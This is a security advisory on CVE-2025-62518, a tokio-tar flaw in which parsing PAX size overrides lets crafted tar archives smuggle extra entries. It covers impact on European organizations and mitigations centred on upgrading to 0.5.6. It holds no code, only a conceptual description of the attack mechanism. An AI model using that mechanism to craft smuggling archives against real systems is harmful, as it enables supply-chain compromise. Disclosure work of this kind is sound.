CVE-2025-62518 is a type confusion vulnerability classified under CWE-843 found in the astral-sh tokio-tar library, a Rust async tar archive reading and writing tool. The vulnerability stems from inconsistent handling of PAX-extended headers that specify size overrides. When processing tar archives, the parser should use the size specified in the PAX header to advance the stream position correctly. However, in versions prior to 0.5.6, the parser erroneously uses the ustar header size, which is often zero, causing it to misinterpret subsequent file content as valid tar headers. This flaw allows an attacker to craft malicious tar archives that smuggle additional archive entries, potentially bypassing security controls or causing unexpected behavior during archive extraction. The vulnerability does not require privileges but does require user interaction to process the malicious archive. The impact includes unauthorized disclosure or modification of archive contents, potentially leading to code execution or data corruption. The issue has been patched in version 0.5.6, and no workarounds are available. While no exploits are currently known in the wild, the high CVSS score of 8.1 reflects the significant risk posed by this vulnerability, especially in environments where tokio-tar is used to process untrusted archives.

For European organizations, the impact of CVE-2025-62518 can be substantial, particularly for those relying on Rust-based tooling or applications that incorporate the astral-sh tokio-tar library for archive processing. Exploitation could allow attackers to smuggle unauthorized files into archives, potentially leading to unauthorized data disclosure or modification. This can compromise the confidentiality and integrity of sensitive data, especially in sectors like finance, healthcare, and government where secure archive handling is critical. Additionally, if the malicious archive processing is part of automated pipelines or CI/CD systems, it could lead to supply chain compromises or code execution. The lack of authentication requirements and the ease of exploitation via crafted archives increase the threat surface. European organizations that handle large volumes of tar archives, such as cloud service providers, software vendors, and research institutions, are at higher risk. The vulnerability could also affect compliance with data protection regulations such as GDPR if sensitive data is exposed or altered.

The primary mitigation is to upgrade all instances of the astral-sh tokio-tar library to version 0.5.6 or later, where the vulnerability is patched. Organizations should conduct an inventory of Rust-based applications and dependencies to identify usage of tokio-tar and ensure timely updates. For environments where immediate upgrading is not feasible, implement strict validation and scanning of tar archives before processing, using alternative tools that do not exhibit this vulnerability. Incorporate sandboxing or isolation techniques when handling untrusted archives to limit potential damage. Monitor logs and audit archive processing activities for anomalies indicative of exploitation attempts. Additionally, educate developers and DevOps teams about the risks of processing untrusted archives and enforce secure coding practices around archive handling. Finally, maintain up-to-date threat intelligence feeds to detect any emerging exploits targeting this vulnerability.